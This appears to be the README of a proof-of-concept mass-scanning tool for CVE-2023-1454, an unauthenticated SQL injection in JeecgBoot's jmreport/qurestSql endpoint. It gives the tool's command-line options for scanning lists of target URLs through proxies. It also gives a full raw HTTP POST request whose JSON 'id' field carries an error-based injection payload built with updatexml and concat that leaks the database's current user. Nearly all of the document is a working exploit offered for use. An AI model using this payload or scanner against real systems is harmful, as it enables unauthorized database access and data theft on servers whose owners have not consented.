jmreport/qurestSql 未授权SQL注册批量扫描poc

usage: CVE-2023-1454.py [-h] [-u URL] [-f FILE] [-t THREAD] [-T TIMEOUT] [-o OUTPUT] [-p PROXY]
optional arguments:  -h, --help            show this help message and exit  -u URL, --url URL     Target url(e.g. url.txt)  -f FILE, --file FILE  Target file(e.g. url.txt)  -t THREAD, --thread THREAD                        Number of thread (default 5)  -T TIMEOUT, --timeout TIMEOUT                        Request timeout (default 3)  -o OUTPUT, --output OUTPUT                        Vuln url output file (e.g. result.txt)  -p PROXY, --proxy PROXY                        Request Proxy (e.g http://127.0.0.1:8080)

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/json;charset=UTF-8Content-Length: 128
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}